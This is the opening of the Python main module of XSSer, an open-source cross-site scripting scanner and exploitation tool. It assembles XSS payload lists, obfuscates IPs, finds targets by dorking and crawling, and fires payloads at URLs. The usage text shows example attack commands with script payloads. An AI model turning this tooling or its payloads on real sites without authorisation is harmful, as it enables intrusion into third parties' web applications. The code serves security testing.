main.py 209 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219322032213222322332243225322632273228322932303231323232333234323532363237323832393240324132423243324432453246324732483249325032513252325332543255325632573258325932603261326232633264326532663267326832693270327132723273327432753276327732783279328032813282328332843285328632873288328932903291329232933294329532963297329832993300330133023303330433053306330733083309331033113312331333143315331633173318331933203321332233233324332533263327332833293330333133323333333433353336333733383339334033413342334333443345334633473348334933503351335233533354335533563357335833593360336133623363336433653366336733683369337033713372337333743375337633773378337933803381338233833384338533863387338833893390339133923393339433953396339733983399340034013402340334043405340634073408340934103411341234133414341534163417341834193420342134223423342434253426342734283429343034313432343334343435343634373438343934403441344234433444344534463447344834493450345134523453345434553456345734583459346034613462346334643465346634673468346934703471347234733474347534763477347834793480348134823483348434853486348734883489349034913492349334943495349634973498349935003501350235033504350535063507350835093510351135123513351435153516351735183519352035213522352335243525352635273528352935303531353235333534353535363537353835393540354135423543354435453546354735483549355035513552355335543555355635573558355935603561356235633564356535663567356835693570357135723573357435753576357735783579358035813582358335843585358635873588358935903591359235933594359535963597359835993600360136023603360436053606360736083609361036113612361336143615361636173618361936203621362236233624362536263627362836293630363136323633363436353636363736383639364036413642364336443645364636473648364936503651365236533654365536563657365836593660366136623663366436653666366736683669367036713672367336743675367636773678367936803681368236833684368536863687368836893690369136923693369436953696369736983699370037013702370337043705370637073708370937103711371237133714371537163717371837193720372137223723372437253726372737283729373037313732373337343735373637373738373937403741374237433744374537463747374837493750375137523753375437553756375737583759376037613762376337643765376637673768376937703771377237733774377537763777377837793780378137823783378437853786378737883789379037913792379337943795379637973798379938003801380238033804380538063807380838093810381138123813381438153816381738183819382038213822382338243825382638273828
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. import os, re, sys, datetime, hashlib, time, cgi, traceback, webbrowser, random
  19. try:
  20. import urllib.request, urllib.error, urllib.parse
  21. except:
  22. print ("\n[Info] XSSer no longer supports Python2: (https://www.python.org/doc/sunset-python-2/). Try to run the tool with Python3.x.y... (ex: python3 xsser)\n")
  23. sys.exit()
  24. from random import randint
  25. from base64 import b64encode, b64decode
  26. from http.cookies import SimpleCookie
  27. import core.fuzzing
  28. import core.fuzzing.vectors
  29. import core.fuzzing.DCP
  30. import core.fuzzing.DOM
  31. import core.fuzzing.HTTPsr
  32. import core.fuzzing.heuristic
  33. from collections import defaultdict
  34. from itertools import islice, chain
  35. from urllib.parse import parse_qs, urlparse
  36. from core.curlcontrol import Curl
  37. from core.encdec import EncoderDecoder
  38. from core.options import XSSerOptions
  39. from core.dork import Dorker
  40. from core.crawler import Crawler
  41. from core.imagexss import ImageInjections
  42. from core.flashxss import FlashInjections
  43. from core.post.xml_exporter import xml_reporting
  44. from core.tokenhub import HubThread
  45. from core.reporter import XSSerReporter
  46. from core.threadpool import ThreadPool, NoResultsPending
  47. from core.update import Updater
  48. # set to emit debug messages about errors (False = off).
  49. DEBUG = False
  50. class xsser(EncoderDecoder, XSSerReporter):
  51. """
  52. XSSer application class
  53. """
  54. def __init__(self, mothership=None):
  55. self._reporter = None
  56. self._reporters = []
  57. self._landing = False
  58. self._ongoing_requests = 0
  59. self._oldcurl = []
  60. self._gtkdir = None
  61. self._webbrowser = webbrowser
  62. self.crawled_urls = []
  63. self.checked_urls = []
  64. self.successful_urls = []
  65. self.urlmalformed = False
  66. self.search_engines = [] # available dorking search engines
  67. self.search_engines.append('bing') # [26/08/2019: OK!]
  68. self.search_engines.append('yahoo') # [26/08/2019: OK!]
  69. self.search_engines.append('startpage') # [26/08/2019: OK!]
  70. self.search_engines.append('duck') # [26/08/2019: OK!]
  71. #self.search_engines.append('google')
  72. #self.search_engines.append('yandex')
  73. self.user_template = None # wizard user template
  74. self.user_template_conntype = "GET" # GET by default
  75. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
  76. if not mothership:
  77. # no mothership so *this* is the mothership
  78. # start the communications hub and rock on!
  79. self.hub = None
  80. self.pool = ThreadPool(0)
  81. self.mothership = None
  82. self.final_attacks = {}
  83. else:
  84. self.hub = None
  85. self.mothership = mothership
  86. self.mothership.add_reporter(self)
  87. self.pool = ThreadPool(0)
  88. self.final_attacks = self.mothership.final_attacks
  89. # initialize the url encoder/decoder
  90. EncoderDecoder.__init__(self)
  91. # your unique real opponent
  92. self.time = datetime.datetime.now()
  93. # this payload comes with vector already..
  94. self.DEFAULT_XSS_PAYLOAD = 'XSS'
  95. # to be or not to be...
  96. self.hash_found = []
  97. self.hash_notfound = []
  98. # other hashes
  99. self.hashed_injections={}
  100. self.extra_hashed_injections={}
  101. self.extra_hashed_vector_url = {}
  102. self.final_hashes = {} # final hashes used by each method
  103. # some counters for checker systems
  104. self.errors_isalive = 0
  105. self.next_isalive = False
  106. self.flag_isalive_num = 0
  107. self.rounds = 0
  108. self.round_complete = 0
  109. # some controls about targets
  110. self.urlspoll = []
  111. # some statistics counters for connections
  112. self.success_connection = 0
  113. self.not_connection = 0
  114. self.forwarded_connection = 0
  115. self.other_connection = 0
  116. # some statistics counters for payloads
  117. self.xsr_injection = 0
  118. self.xsa_injection = 0
  119. self.coo_injection = 0
  120. self.manual_injection = 0
  121. self.auto_injection = 0
  122. self.dcp_injection = 0
  123. self.dom_injection = 0
  124. self.httpsr_injection = 0
  125. self.check_positives = 0
  126. # some statistics counters for injections found
  127. self.xsr_found = 0
  128. self.xsa_found = 0
  129. self.coo_found = 0
  130. self.manual_found = 0
  131. self.auto_found = 0
  132. self.dcp_found = 0
  133. self.dom_found = 0
  134. self.httpsr_found = 0
  135. self.false_positives = 0
  136. # some statistics counters for heuristic parameters
  137. self.heuris_hashes = []
  138. self.heuris_backslash_found = 0
  139. self.heuris_une_backslash_found = 0
  140. self.heuris_dec_backslash_found = 0
  141. self.heuris_backslash_notfound = 0
  142. self.heuris_slash_found = 0
  143. self.heuris_une_slash_found = 0
  144. self.heuris_dec_slash_found = 0
  145. self.heuris_slash_notfound = 0
  146. self.heuris_mayor_found = 0
  147. self.heuris_une_mayor_found = 0
  148. self.heuris_dec_mayor_found = 0
  149. self.heuris_mayor_notfound = 0
  150. self.heuris_minor_found = 0
  151. self.heuris_une_minor_found = 0
  152. self.heuris_dec_minor_found = 0
  153. self.heuris_minor_notfound = 0
  154. self.heuris_semicolon_found = 0
  155. self.heuris_une_semicolon_found = 0
  156. self.heuris_dec_semicolon_found = 0
  157. self.heuris_semicolon_notfound = 0
  158. self.heuris_colon_found = 0
  159. self.heuris_une_colon_found = 0
  160. self.heuris_dec_colon_found = 0
  161. self.heuris_colon_notfound = 0
  162. self.heuris_doublecolon_found = 0
  163. self.heuris_une_doublecolon_found = 0
  164. self.heuris_dec_doublecolon_found = 0
  165. self.heuris_doublecolon_notfound = 0
  166. self.heuris_equal_found = 0
  167. self.heuris_une_equal_found = 0
  168. self.heuris_dec_equal_found = 0
  169. self.heuris_equal_notfound = 0
  170. # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
  171. self.verbose = 2
  172. self.options = None
  173. def __del__(self):
  174. if not self._landing:
  175. self.land()
  176. def get_gtk_directory(self):
  177. if self._gtkdir:
  178. return self._gtkdir
  179. local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
  180. 'gtk')
  181. if os.path.exists(local_path):
  182. self._gtkdir = local_path
  183. return self._gtkdir
  184. elif os.path.exists('/usr/share/xsser/gtk'):
  185. self._gtkdir = '/usr/share/xsser/gtk'
  186. return self._gtkdir
  187. def set_webbrowser(self, browser):
  188. self._webbrowser = browser
  189. def set_reporter(self, reporter):
  190. self._reporter = reporter
  191. def add_reporter(self, reporter):
  192. self._reporters.append(reporter)
  193. def remove_reporter(self, reporter):
  194. if reporter in self._reporters:
  195. self._reporters.remove(reporter)
  196. def generate_hash(self, attack_type='default'):
  197. """
  198. Generate a new hash for a type of attack.
  199. """
  200. date = str(datetime.datetime.now())
  201. encoded_hash = date + attack_type
  202. return hashlib.md5(encoded_hash.encode('utf-8')).hexdigest()
  203. def generate_numeric_hash(self): # 32 length as md5
  204. """
  205. Generate a new hash for numeric only XSS
  206. """
  207. newhash = ''.join(random.choice('0123456789') for i in range(32))
  208. return newhash
  209. def report(self, msg, level='info'):
  210. """
  211. Report some error from the application.
  212. levels: debug, info, warning, error
  213. """
  214. if self.verbose == 2:
  215. prefix = ""
  216. if level != 'info':
  217. prefix = "["+level+"] "
  218. print(msg)
  219. elif self.verbose:
  220. if level == 'error':
  221. sys.stdout.write("*")
  222. else:
  223. sys.stdout.write(".")
  224. for reporter in self._reporters:
  225. reporter.post(msg)
  226. if self._reporter:
  227. from twisted.internet import reactor
  228. reactor.callFromThread(self._reporter.post, msg)
  229. def set_options(self, options):
  230. """
  231. Set xsser options
  232. """
  233. self.options = options
  234. self._opt_request()
  235. def _opt_request(self):
  236. """
  237. Pass on some properties to Curl
  238. """
  239. options = self.options
  240. for opt in ['cookie', 'agent', 'referer',\
  241. 'headers', 'atype', 'acred', 'acert',
  242. 'proxy', 'ignoreproxy', 'timeout',
  243. 'delay', 'tcp_nodelay', 'retries',
  244. 'xforw', 'xclient', 'threads',
  245. 'dropcookie', 'followred', 'fli',
  246. 'nohead', 'isalive', 'alt', 'altm',
  247. 'ald'
  248. ]:
  249. if hasattr(options, opt) and getattr(options, opt):
  250. setattr(Curl, opt, getattr(options, opt))
  251. def get_payloads(self):
  252. """
  253. Process payload options and make up the payload list for the attack.
  254. """
  255. options = self.options
  256. # payloading sources for --auto
  257. payloads_fuzz = core.fuzzing.vectors.vectors
  258. if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
  259. self.options.fuzz = True
  260. # set a type for XSS auto-fuzzing vectors
  261. if options.fzz_info:
  262. fzz_payloads = []
  263. for fuzz in payloads_fuzz:
  264. if not fuzz["browser"] == "[Not Info]":
  265. fzz_payloads.append(fuzz)
  266. payloads_fuzz = fzz_payloads
  267. # set a limit for XSS auto-fuzzing vectors
  268. if options.fzz_num:
  269. try:
  270. options.fzz_num = int(options.fzz_num)
  271. except:
  272. options.fzz_num = len(payloads_fuzz)
  273. fzz_num_payloads = []
  274. fzz_vector = 0
  275. for fuzz in payloads_fuzz:
  276. fzz_vector = fzz_vector + 1
  277. if int(fzz_vector) < int(options.fzz_num)+1:
  278. fzz_num_payloads.append(fuzz)
  279. payloads_fuzz = fzz_num_payloads
  280. # set random order for XSS auto-fuzzing vectors
  281. if options.fzz_rand:
  282. try:
  283. from random import shuffle
  284. shuffle(payloads_fuzz) # shuffle paylods
  285. except:
  286. pass
  287. payloads_dcp = core.fuzzing.DCP.DCPvectors
  288. payloads_dom = core.fuzzing.DOM.DOMvectors
  289. payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
  290. manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
  291. # sustitute payload for hash to check for false positives
  292. self.hashed_payload = "XSS"
  293. checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
  294. # heuristic parameters
  295. heuristic_params = core.fuzzing.heuristic.heuristic_test
  296. def enable_options_heuristic(payloads):
  297. if options.heuristic:
  298. payloads = heuristic_params + payloads
  299. if options.dom:
  300. payloads = payloads + payloads_dom
  301. return payloads
  302. if options.fuzz:
  303. payloads = payloads_fuzz
  304. if options.dcp:
  305. payloads = payloads + payloads_dcp
  306. if options.script:
  307. payloads = payloads + manual_payload
  308. if options.hash:
  309. payloads = checker_payload + payloads
  310. if options.inducedcode:
  311. payloads = payloads + payloads_httpsr
  312. if options.heuristic:
  313. payloads = heuristic_params + payloads
  314. if options.dom:
  315. payloads = payloads + payloads_dom
  316. elif options.inducedcode:
  317. payloads = payloads + payloads_httpsr
  318. if options.heuristic:
  319. payloads = heuristic_params + payloads
  320. if options.dom:
  321. payloads = payloads + payloads_dom
  322. elif options.dom:
  323. payloads = payloads + payloads_dom
  324. elif options.heuristic:
  325. payloads = heuristic_params + payloads
  326. if options.dom:
  327. payloads = payloads + payloads_dom
  328. elif options.dom:
  329. payloads = payloads + payloads_dom
  330. elif options.hash:
  331. payloads = checker_payload + payloads
  332. if options.inducedcode:
  333. payloads = payloads + payloads_httpsr
  334. if options.heuristic:
  335. payloads = heuristic_params + payloads
  336. if options.dom:
  337. payloads = payloads + payloads_dom
  338. elif options.dom:
  339. payloads = payloads + payloads_dom
  340. elif options.inducedcode:
  341. payloads = payloads + payloads_httpsr
  342. if options.heuristic:
  343. payloads = heuristic_params + payloads
  344. if options.dom:
  345. payloads = payloads + payloads_dom
  346. elif options.dom:
  347. payloads = payloads + payloads_dom
  348. elif options.script:
  349. payloads = payloads + manual_payload
  350. if options.hash:
  351. payloads = checker_payload + payloads
  352. if options.inducedcode:
  353. payloads = payaloads + payloads_httpsr
  354. if options.heuristic:
  355. payloads = heuristic_params + payloads
  356. if options.dom:
  357. payloads = payloads + payloads_dom
  358. elif options.hash:
  359. payloads = checker_payload + payloads
  360. if options.inducedcode:
  361. payloads = payloads + payloads_httpsr
  362. if options.heuristic:
  363. payloads = heuristic_params + payloads
  364. if options.dom:
  365. payloads = payloads + payloads_dom
  366. elif options.dom:
  367. payloads = payloads + payloads_dom
  368. elif options.heuristic:
  369. payloads = heuristic_params + payloads
  370. if options.dom:
  371. payloads = payloads + payloads_dom
  372. elif options.dom:
  373. payloads = payloads + payloads_dom
  374. elif options.inducedcode:
  375. payloads = payloads + payloads_httpsr
  376. if options.hash:
  377. payloads = checker_payload + payloads
  378. if options.heuristic:
  379. payloads = heuristic_params + payloads
  380. if options.dom:
  381. payloads = payloads + payloads_dom
  382. elif options.dom:
  383. payloads = payloads + payloads_dom
  384. elif options.heuristic:
  385. payloads = heuristic_params + payloads
  386. if options.dom:
  387. payloads = payloads + payloads_dom
  388. elif options.dom:
  389. payloads = payloads + payloads_dom
  390. elif options.dcp:
  391. payloads = payloads_dcp
  392. if options.script:
  393. payloads = payloads + manual_payload
  394. if options.hash:
  395. payloads = checker_payload + payloads
  396. if options.inducedcode:
  397. payloads = payloads + payloads_httpsr
  398. if options.heuristic:
  399. payloads = heuristic_params + payloads
  400. if options.dom:
  401. payloads = payloads + payloads_dom
  402. elif options.hash:
  403. payloads = checker_payload + payloads
  404. if options.inducedcode:
  405. payloads = payloads + inducedcode
  406. if options.heuristic:
  407. payloads = heuristic_params + payloads
  408. if options.dom:
  409. payloads = payloads + payloads_dom
  410. elif options.dom:
  411. payloads = payloads + payloads_dom
  412. elif options.inducedcode:
  413. payloads = payloads + payloads_httpsr
  414. if options.heuristic:
  415. payloads = heuristic_params + payloads
  416. if options.dom:
  417. payloads = payloads + payloads_dom
  418. elif options.dom:
  419. payloads = payloads + payloads_dom
  420. elif options.heuristic:
  421. payloads = heuristic_params + payloads
  422. if options.dom:
  423. payloads = payloads + payloads_dom
  424. elif options.dom:
  425. payloads = payloads + payloads_dom
  426. elif options.script:
  427. payloads = manual_payload
  428. if options.hash:
  429. payloads = checker_payload + payloads
  430. if options.inducedcode:
  431. payloads = payloads + payloads_httpsr
  432. if options.heuristic:
  433. payloads = heuristic_params + payloads
  434. if options.dom:
  435. payloads = payloads + payloads_dom
  436. elif options.inducedcode:
  437. payloads = payloads + payloads_httpsr
  438. if options.heuristic:
  439. payloads = heuristic_params + payloads
  440. if options.dom:
  441. payloads = payloads + payloads_dom
  442. elif options.dom:
  443. payloads = payloads + payloads_dom
  444. elif options.heuristic:
  445. payloads = heuristic_params + payloads
  446. if options.dom:
  447. paylaods = payloads + payloads_dom
  448. elif options.dom:
  449. payloads = payloads + payloads_dom
  450. elif options.inducedcode:
  451. payloads = payloads_httpsr
  452. if options.hash:
  453. payloads = checker_payload + payloads
  454. if options.heuristic:
  455. payloads = heuristic_params + payloads
  456. if options.dom:
  457. payloads = payloads + payloads_dom
  458. elif options.heuristic:
  459. payloads = heuristic_params + payloads
  460. if options.dom:
  461. payloads = payloads + payloads_dom
  462. elif options.dom:
  463. payloads = payloads + payloads_dom
  464. elif options.heuristic:
  465. payloads = heuristic_params
  466. if options.hash:
  467. payloads = checker_payload + payloads
  468. if options.dom:
  469. payloads = payloads + payloads_dom
  470. elif options.dom:
  471. payloads = payloads + payloads_dom
  472. elif options.dom:
  473. payloads = payloads_dom
  474. elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
  475. payloads = [{"payload":'">PAYLOAD',
  476. "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
  477. }]
  478. else:
  479. payloads = checker_payload
  480. return payloads
  481. def process_ipfuzzing(self, text):
  482. """
  483. Mask ips in given text to DWORD
  484. """
  485. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  486. for ip in ips:
  487. text = text.replace(ip, str(self._ipDwordEncode(ip)))
  488. return text
  489. def process_ipfuzzing_octal(self, text):
  490. """
  491. Mask ips in given text to Octal
  492. """
  493. ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
  494. for ip in ips:
  495. text = text.replace(ip, str(self._ipOctalEncode(ip)))
  496. return text
  497. def process_payloads_ipfuzzing(self, payloads):
  498. """
  499. Mask ips for all given payloads using DWORD
  500. """
  501. # ip fuzzing (DWORD)
  502. if self.options.Dwo:
  503. resulting_payloads = []
  504. for payload in payloads:
  505. payload["payload"] = self.process_ipfuzzing(payload["payload"])
  506. resulting_payloads.append(payload)
  507. return resulting_payloads
  508. return payloads
  509. def process_payloads_ipfuzzing_octal(self, payloads):
  510. """
  511. Mask ips for all given payloads using OCTAL
  512. """
  513. # ip fuzzing (OCTAL)
  514. if self.options.Doo:
  515. resulting_payloads = []
  516. for payload in payloads:
  517. payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
  518. resulting_payloads.append(payload)
  519. return resulting_payloads
  520. return payloads
  521. def get_query_string(self):
  522. """
  523. Get the supplied query string.
  524. """
  525. if self.options.postdata:
  526. return self.options.postdata
  527. elif self.options.getdata:
  528. return self.options.getdata
  529. return ""
  530. def attack_url(self, url, payloads, query_string):
  531. """
  532. Attack the given url checking or not if is correct.
  533. """
  534. if not self.options.nohead:
  535. for payload in payloads:
  536. self.rounds = self.rounds + 1
  537. self.attack_url_payload(url, payload, query_string)
  538. else:
  539. hc = Curl()
  540. try:
  541. urls = hc.do_head_check([url])
  542. except:
  543. self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
  544. return
  545. self.report("-"*50 + "\n")
  546. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  547. if str(hc.info()["http-code"]) in ["301"]:
  548. url = str(hc.info()["Location"])
  549. payload = ""
  550. query_string = ""
  551. elif str(hc.info()["http-code"]) in ["302"]:
  552. url = url + "/"
  553. payload = ""
  554. query_string = ""
  555. self.success_connection = self.success_connection + 1
  556. self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
  557. for payload in payloads:
  558. self.attack_url_payload(url, payload, query_string)
  559. else:
  560. if str(hc.info()["http-code"]) in ["405"]:
  561. self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
  562. self.success_connection = self.success_connection + 1
  563. for payload in payloads:
  564. self.attack_url_payload(url, payload, query_string)
  565. else:
  566. self.not_connection = self.not_connection + 1
  567. self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
  568. self.report("-"*50 + "\n")
  569. def not_keyword_exit(self):
  570. self.report("="*30)
  571. self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
  572. self.report("-"*25)
  573. self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
  574. self.report(" - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
  575. self.report(" - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
  576. self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
  577. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
  578. self.report(" - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
  579. self.report(" - ex (Dorker): xsser -d 'news.php?id=' --Da")
  580. self.report(" - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
  581. self.report(" Or a mixture:\n")
  582. self.report(" - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
  583. self.report(" - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
  584. self.report(" - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
  585. self.report(" - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
  586. self.report("="*75 + "\n")
  587. if not self.options.xsser_gtk:
  588. sys.exit(2)
  589. else:
  590. pass
